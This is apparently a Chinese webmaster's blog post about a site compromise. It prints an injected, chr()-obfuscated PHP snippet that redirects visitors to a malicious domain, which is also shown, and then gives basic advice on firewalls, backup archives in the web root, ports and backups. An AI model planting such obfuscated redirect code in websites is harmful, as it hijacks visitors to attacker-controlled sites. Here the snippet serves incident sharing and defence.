今天中午发现我的网站被恶意重定向了,通过日志发现是有人通过网站下载备份包压缩包获取密码数据库信息,我也百度了一下也有很多同样遭遇应为插件后门系统本身后台漏洞注入病毒,所以说防火墙,压缩包,端口,网站数据备份非常有必要注意,下面给大家一些方法避免很多萌新站长也莫名奇妙的被挂马
具体添加内容
导致重定向到https://irc.lovegreenpencils.ga/55ryery?id=22584&rs=2346
大佬们也可以分析一下这段代码
<?php $a="h"."ea"."der";$a(chr(76).chr(111).chr(99).chr(97).chr(116).chr(105).chr(111).chr(110).chr(58).chr(32).chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(105).chr(114).chr(99).chr(46).chr(108).chr(111).chr(118).chr(101).chr(103).chr(114).chr(101).chr(101).chr(110).chr(112).chr(101).chr(110).chr(99).chr(105).chr(108).chr(115).chr(46).chr(103).chr(97).chr(47).chr(53).chr(53).chr(114).chr(121).chr(101).chr(114).chr(121).chr(63).chr(105).chr(100).chr(61).chr(50).chr(50).chr(53).chr(56).chr(52).chr(38).chr(114).chr(115).chr(61).chr(50).chr(51).chr(52).chr(54));?><?php
1.防火墙
防火墙有很多种类比如说:(网络层防火墙,应用层防火墙)
网络层防火墙:
例如:来源 IP 地址、来源端口号、目的 IP 地址或端口号、服务类型(如 WWW 或是 FTP)。也能经由通信协议、TTL 值、来源的网域名称或网段...等 xss云小编也整合比简单较好用的方法 比如:用cdn来阻止恶意入侵,注入,利用后门 注:推荐创宇云
应用层防火墙:
常见的就比如宝塔自带的防火墙
2.压缩包:
经常网站会把压缩包放在网站根目录,导致很多人通过下载网站压缩包来获取账号密码,所以最好不要在根目录放压缩包
3.端口:
端口对大家应该不陌生,一般不用的时候尽量把端口关闭只留80,443
4.网站数据备份:
网站数据备份是最重要的不管怎么入侵,只要有备份数据在恢复和修复漏洞都是比较快的
请登录后查看评论内容